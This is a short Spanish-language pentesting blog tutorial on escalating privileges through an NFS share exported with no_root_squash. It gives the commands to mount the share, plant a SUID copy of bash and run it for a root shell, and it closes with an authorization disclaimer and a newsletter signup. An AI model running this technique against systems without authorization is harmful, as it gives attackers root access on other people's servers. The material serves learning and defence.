~ / blog / pentesting
KALI

Privesc por NFS no_root_squash

Aquí se combina red y escalada.

Si un servidor NFS exporta una carpeta con la opción no_root_squash, tu root en tu máquina se respeta como root en el servidor. Montas la carpeta compartida, copias ahí una shell con permisos SUID de root desde tu equipo, y luego, en el servidor, la ejecutas y sales con privilegios de root.

Es una escalada elegante que aprovecha una línea mal puesta en el archivo de exports. Búscala siempre.

# los comandos

www-data@victim:$ showmount -e 10.0.0.5copiar
/shared *(rw,no_root_squash)
www-data@victim:$ mount -t nfs 10.0.0.5:/shared /mnt && cp /bin/bash /mnt/rcopiar
www-data@victim:$ chmod +s /mnt/r # como root localcopiar
www-data@victim:$ /shared/r -pcopiar
r-5.1# id -> euid=0(root)
Solo con permiso. Esto se muestra con fines educativos y defensivos: úsalo únicamente en sistemas propios o donde tengas autorización. Entender el ataque es lo que te permite defenderte de él.
root@cero: ~/newsletter
┌──(root@cero)-[~]
└─# suscribir --envio-semanal
un comando a la semana que te hace más difícil de hackear.
una sola herramienta, explicada en español claro, cada semana. lo mejor de los reels, directo a tu correo.
email =
sin spam. un correo a la semana. te sales cuando quieras.